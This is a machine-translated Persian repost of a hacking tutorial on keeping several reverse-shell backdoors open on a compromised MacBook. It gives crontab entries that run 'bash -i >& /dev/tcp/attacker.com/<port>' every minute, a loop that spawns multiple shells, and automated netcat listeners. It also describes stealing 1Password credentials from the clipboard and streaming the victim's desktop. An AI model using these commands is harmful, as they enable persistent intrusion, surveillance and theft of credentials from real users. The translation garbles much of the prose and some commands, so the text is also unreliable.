نرم macOS: چگونه به تخم ریزی چند رشته راحت درب پشتی بر روی یک مک بوک

یک مهاجم می تواند ایجاد در پنج یا حتی ده جدید راحت اتصال به یک مصالحه مک بوک با یک دستور. انجام مجموعه پس از

توسط PATRIS-MUSIC در 1 مرداد 1399

یک مهاجم می تواند ایجاد در پنج یا حتی ده جدید راحت اتصال به یک مصالحه مک بوک با یک دستور. انجام مجموعه پس از بهره برداری حملات در غیر این صورت ممکن بود مشکل از یک پوسته بدون این ترفند ضروری.

به همین دلیل ایجاد چندین راحت تاپیک ؟

با برخی از macOS پست-بهره برداری حملات بیش از یک پوسته ممکن است لازم باشد. تخم ریزی اضافی راحت اتصالات از یک backdoor است که ممکن است اما می تواند دست و پا گیر و ناخوشایند است. بنابراین من آمد تا با یک راه حل ساده است که متکی بر تاریخ فعلی برای پیش بینی آینده, زمان و شماره پورت backdoor استفاده خواهد شد.

پنج راحت ارتباط برقرار در یک بار.

این GIF فوق نشان می دهد پنج Netcat اتصالات حال تاسیس در همان زمان. ما می توانید ببینید که چگونه راحت آن را به حرکت اتصالات چندگانه به عنوان برخی از پایه آگاهی موقعیتی حملات با system_profiler انجام می شود.

رشته های زیر یک مثال از یک باش به فرمان استفاده می شود معمولا با crontab به backdoor: macOS. آن را ایجاد یک اتصال TCP به نفوذگر سیستم. این یک روش شناخته شده برای ایجاد اتصالات TCP به یک شنونده راحت و تعبیه شده می توان به سیستم عامل و اعدام هر شصت ثانیه.

* * * * * bash-i >& /dev/tcp/مهاجم.com/8080 0>&1

Crontab تلاش خواهد کرد برای اتصال به مهاجم سرور بر روی پورت 8080 هر زمان. اگر یک اتصال در حال حاضر ایجاد شده است که فرمان سکوت خواهد شکست به عنوان پورت اشغال شده است. مهاجم از راه دور دسترسی محدود به یکی مداوم backdoor با استفاده از این.

این فرمان می تواند اصلاح شود به یک پورت پویا شماره های تعریف شده فعلی دقیقه است.

* * * * * bash-i >& /dev/tcp/مهاجم.com/$(تاریخ +\%M) 0>&1

متوجه تاریخ فرمان با %M گزینه است. اگر زمان 10:15 بعد از ظهر پورت 15 استفاده خواهد شد. اگر زمان 3:42 صبح پورت 42 مورد استفاده قرار خواهد گرفت. هر دقیقه در این زمان است که آنچه در این بندر خواهد بود. این امر به طور چشمگیری کاهش تعداد پورت درگیری که رخ می دهد و اجازه می دهد مهاجم جدید برای باز کردن یک اتصال راحت هر دقیقه در صورت نیاز.

ایجاد اخباری راحت شنوندگان

برای ایجاد یک شنونده برای پویا پورت همه یک مهاجم نیاز به انجام است که در زمان کنونی. اگر وقت شد 7:30 p. m. به دستور زیر خواهد رهگیری بعدی اتصال.

~$ nc -l -p 31

بعدی انتظار اتصال نیاز به استفاده به عنوان هر دو macOS و کالی ممکن است از همان زمان است. معنی کالی می تواند دست اتصال فقط المللي بیش از حد دیر است. شنونده و اتصال نمی تواند تاسیس شود به طور همزمان. کالی نیاز به اخباری انتظار برای آینده تلاش برای اتصال.

به طور خودکار فرآیند کمی تاریخ نیز می توان در کالی با شصت ثانیه اضافه شده است.

~$ nc -l -p $(date +%M --تاریخ "+60 ثانیه")

ایجاد چندین اتصالات همزمان

این منطقی به نظر می رسید به آن را تا درجه یک و backdoor ایجاد اتصالات چندگانه در یک بار. زیر را برای حلقه یک مثال ساده از چگونگی این می تواند انجام شود.

* * * * * * * * برای من در {1..3};آیا باش -من >& /dev/tcp/مهاجم.com/$i$(تاریخ +\%M) 0>&1 & انجام می شود

این برای حلقه اجرا خواهد شد باش فرمان سه بار ({1..3}). اتصالات سه تلاش هر شصت ثانیه ایجاد سر و صدای زیادی در شبکه خواهد شد اما کار برای مقاصد تظاهرات. هر گونه تلاش بیشتر در هر دقیقه است که احتمالا به درد نمیخورد. متغیر $من است prepended به دقیقه و به عنوان شماره پورت.

اگر زمان کنونی است ساعت 5:45 صبح سه اتصالات ساخته خواهد شد با پورت 145, 245 و 345.

ایجاد سه اخباری راحت شنوندگان روی حیله و تزویر است. به طور کلی Tilix مورد نظر من است terminal multiplexer آن را به عنوان اجازه می دهد تا چندین پوسته در یک پنجره (زیر نشان داده شده است). این ویژگی توانایی به طور خودکار تقسیم (-a) پنجره در نیمه حالی که اجرای (-e) یک فرمان.

Tilix می تواند در نصب کالی با دستور زیر.

~$ sudo apt update && sudo apt نصب tilix آمار:1 http://dl.google.com/linux/chrome/deb پایدار InRelease
آمار:3 http://kali.download/kali kali-نورد InRelease
Ign:2 https://dl.bintray.com/etcher/debian پایدار InRelease
Err:4 https://dl.bintray.com/etcher/debian نسخه پایدار 403 Forbidden [IP: 54.148.239.199 443]
Reading package lists... انجام می شود Reading package lists... انجام می شود
ساختمان وابستگی درخت
خواندن اطلاعات دولتی انجام می شود... زیر بسته های اضافی نصب خواهد شد: libgtkd-3-0 libphobos2-ldc-shared91 libvted-3-0 tilix-مشترک
پیشنهاد بسته های:
python-nautilus
زیر بسته های جدید نصب خواهد شد: libgtkd-3-0 libphobos2-ldc-shared91 libvted-3-0 tilix tilix-مشترک
0 به روز رسانی 5 به تازگی نصب شده 0 برای حذف و 857 به روز رسانی نشده است.
نیاز به 4,053 kB بایگانی.
پس از این عملیات 25.2 مگابایت از فضای دیسک اضافی استفاده خواهد شد.
آیا شما می خواهید ادامه دهید ؟ [Y/n] y
دریافت:1 http://kali.download/kali kali-نورد/main amd64 libphobos2-ldc-shared91 amd64 1:1.21.0-1+b1 [1,265 kB]
دریافت:2 http://kali.download/kali kali-نورد/main amd64 libgtkd-3-0 amd64 3.9.0-3+b3 [1,892 kB]
دریافت:3 http://kali.download/kali kali-نورد/main amd64 libvted-3-0 amd64 3.9.0-3+b3 [86.1 kB]
دریافت:4 http://kali.download/kali kali-نورد/main amd64 tilix-مشترک تمام 1.9.3-4 [211 kB]
دریافت:5 http://kali.download/kali kali-نورد/main amd64 tilix amd64 1.9.3-4+b2 [599 kB]
ذهن 4,053 kB در 1s (3,717 kB/s)
انتخاب قبلا انتخاب نشده بسته libphobos2-ldc-shared91:amd64.
(خواندن از پایگاه داده ... 377083 فایل ها و دایرکتوری ها در حال حاضر نصب شده است.)
آماده سازی برای باز کردن .../libphobos2-ldc-shared91_1%3a1.21.0-1+b1_amd64.دب ...
نامید libphobos2-ldc-shared91:amd64 (1:1.21.0-1+b1) ...
انتخاب قبلا انتخاب نشده بسته libgtkd-3-0.
آماده سازی برای باز کردن .../libgtkd-3-0_3.9.0-3+b3_amd64.دب ...
نامید libgtkd-3-0 (3.9.0-3+b3) ...
انتخاب قبلا انتخاب نشده بسته libvted-3-0.
آماده سازی برای باز کردن .../libvted-3-0_3.9.0-3+b3_amd64.دب ...
نامید libvted-3-0 (3.9.0-3+b3) ...
انتخاب قبلا انتخاب نشده بسته tilix-رایج است.
آماده سازی برای باز کردن .../tilix-common_1.9.3-4_all.دب ...
نامید tilix-مشترک (1.9.3-4) ...
انتخاب قبلا انتخاب نشده بسته tilix.
آماده سازی برای باز کردن .../tilix_1.9.3-4+b2_amd64.دب ...
نامید tilix (1.9.3-4+b2) ...
راه اندازی tilix-مشترک (1.9.3-4) ...
راه اندازی libphobos2-ldc-shared91:amd64 (1:1.21.0-1+b1) ...
راه اندازی libvted-3-0 (3.9.0-3+b3) ...
راه اندازی libgtkd-3-0 (3.9.0-3+b3) ...
راه اندازی tilix (1.9.3-4+b2) ...
پردازش محرک برای دسکتاپ-فایل-utils (0.24-1) ...
پردازش محرک برای mime پشتیبانی (3.64) ...
پردازش باعث hicolor-icon-theme (0.17-2) ...
پردازش محرک برای گنوم-منوها (3.36.0-1) ...
پردازش باعث libglib2.0-0:amd64 (2.64.2-1) ...
پردازش باعث libc-bin (2.30-4) ...
پردازش محرک برای مرد-db (2.9.1-1) ...
پردازش محرک برای kali-منو (2020.2.2) ...

در اوایل GIF از "هکر" فرماندهی بود که با استفاده از تخم ریزی پنج Netcat شنوندگان به صورت خودکار. که انجام شد با استفاده از Bash نام مستعار. نام مستعار انجام دستور زیر.

هکر ()
{ برای من {1..3};
فراموش tilix -جلسه-اضافه-کردن -e "nc -l -p $i$(date +%M --تاریخ "+60 ثانیه")";
انجام می شود
}

در کالی یک برای حلقه با تاریخ فرمان استفاده می شود به عنوان به خوبی برای تولید راحت شنوندگان. این --تاریخ "+60 ثانیه" گزینه نیز اضافه شده است که طول می کشد زمان کنونی و می افزاید: شصت ثانیه. این تضمین می کند که شنوندگان را از دست ندهید بعدی crontab فاصله.

برای ایجاد نام مستعار باز /root/.bash_aliases فایل با نانو و بالا اضافه کردن تابع. سپس با استفاده از کنترل-X به ترک و ضربه را وارد کنیدو سپس ذخیره آن را با Y. اگر شما در حال حاضر باید این فایل را ایجاد کنید و آن را برای شما.

~$ sudo nano /root/.bash_aliases

در زیر یک GIF از چندین پوسته استفاده می شود در یک سناریوی واقع بینانه تر.

دو جداگانه حملات رخ می دهد که GIF. وجود دارد کلیپ بورد آزادسازی به سرقت 1Password اعتبار و دسکتاپ زنده جریان به جمع آوری اطلاعات در مورد هدف رفتار آنلاین. فعالیت در جهت از پوسته بالا به پایین است:

  1. آماده FFmpeg شنونده به رهگیری جریان ویدئو از کامپیوتر مک بوک.
  2. این pbpaste فرمان استفاده شده است برای تخلیه مک بوک کلیپ بورد در هر پنج ثانیه است. 1Password اعتبار دستگیر شده در این فرآیند و ذخیره شده /tmp/clipboard.txt فایل.
  3. محبوبیت FFmpeg بر روی مک بوک ها و جریان های دسکتاپ.
  4. این اتصال است که عمدتا unutilized در طول این حملات است. آن را به سمت پایان دادن به عنوان خوانده شده /tmp/clipboard.txt فایل و یادگیری نام کاربری و رمز عبور.
  5. MPV پخش ویدئو فرستاده شده از مک بوک را قادر می سازد مهاجم به هدف مرور صفحات وب و ورود به یک WonderHowTo حساب با کمک 1Password.

چه در زمان دو دقیقه به انجام رساندن ممکن است گرفته ام دیگر به حال مهاجم راه اندازی چند رشته backdoor. اتصالات چندگانه ضروری هنگام انجام حملات مختلف.

افکار نهایی

همه این نمونه ها شامل crontab اجرای خودسرانه فرمان هر شصت ثانیه. در واقع اعدام ممکن است رخ دهد هنگامی که یک ساعت یا پنجم-ساعت به حداقل رساندن میزان ترافیک نشات گرفته از مک بوک. هنوز تمام اخباری نمونه می توان به ساعتی و یا روزانه cronjobs.

امکانات نیست در اینجا به پایان. در حالی که این مقاله هدف این است که macOS, مشابه, چند رشته ارتباطات را می توان به پیکربندی خودکار و با PowerShell را بر روی کامپیوتر کاربر در ویندوز 10.

نگه داشتن در ذهن است که تاسیس راحت اتصالات در حال حاضر آسان به نقطه خودکار توسط سیستم های تشخیص. اتصالات متعدد هستند بهترین استفاده را در پایین-امنیت محیط برای همین دلیل. بیش از حد بسیاری از Netcat موضوعات نیز ممکن است باعث شود کامپیوتر هدف به تجربه اتصال به اینترنت کندتر و یا گرما ، داشته باشیم و چقدر اطلاعات هر اتصال را ایجاد می کند به عنوان آن ممکن است خراب کردن حمله.

اگر شما لذت می برد این مقاله به دنبال من در توییتر @tokyoneon_ و GitHub برای نگه داشتن با زمان پروژه. برای پرسش ها و نگرانی های ترک نظر و یا پیام من در توییتر.

می خواهید شروع به ساختن پول به عنوان یک کلاه سفید هکر? پرش شروع خود را-کلاه سفید هک حرفه ای با ما 2020 حق بیمه هک اخلاقی, گواهینامه آموزشی از بسته نرم افزاری جدید Null Byte فروشگاه و دریافت بیش از 60 ساعت آموزش از هک اخلاقی حرفه ای است.

خرید در حال حاضر (90 درصد تخفیف) >

عکس پوشش byPixabay/PEXELS; تصویر و فایل های Gif با tokyoneon/Null Byte


tinyurlis.gdu.nuclck.ruulvis.netshrtco.de
آخرین مطالب